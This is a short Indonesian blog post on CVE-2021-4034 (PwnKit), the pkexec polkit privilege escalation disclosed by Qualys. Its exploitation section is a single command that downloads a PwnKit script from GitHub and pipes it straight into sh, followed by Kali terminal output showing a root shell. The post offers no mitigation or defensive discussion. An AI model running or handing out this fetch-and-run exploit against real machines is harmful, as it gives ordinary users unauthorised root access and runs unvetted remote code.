[CVE-2021-4034] Pkexec
Tim Research Qualys telah menemukan kerentanan memory corruption di pkexec polkit, program root SUID yang diinstal secara default di setiap distribusi Linux utama.
Kerentanan yang mudah dieksploitasi ini memungkinkan setiap pengguna biasa untuk mendapatkan hak akses penuh (root).
Tahapan eksploitasi
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
➜ sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
┏━(Message from Kali developers)
┃
┃ This is a minimal installation of Kali Linux, you likely
┃ want to install supplementary tools. Learn how:
┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/
┃
┃ We have kept /usr/bin/python pointing to Python 2 for backwards
┃ compatibility. Learn how to change this and avoid this message:
┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/
┃
┗━(Run: “touch ~/.hushlogin” to hide this message)
root@kali:/tmp# whoami
root
Referensi
- https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
- https://github.com/ly4k/PwnKit
This post is licensed under CC BY 4.0 by the author.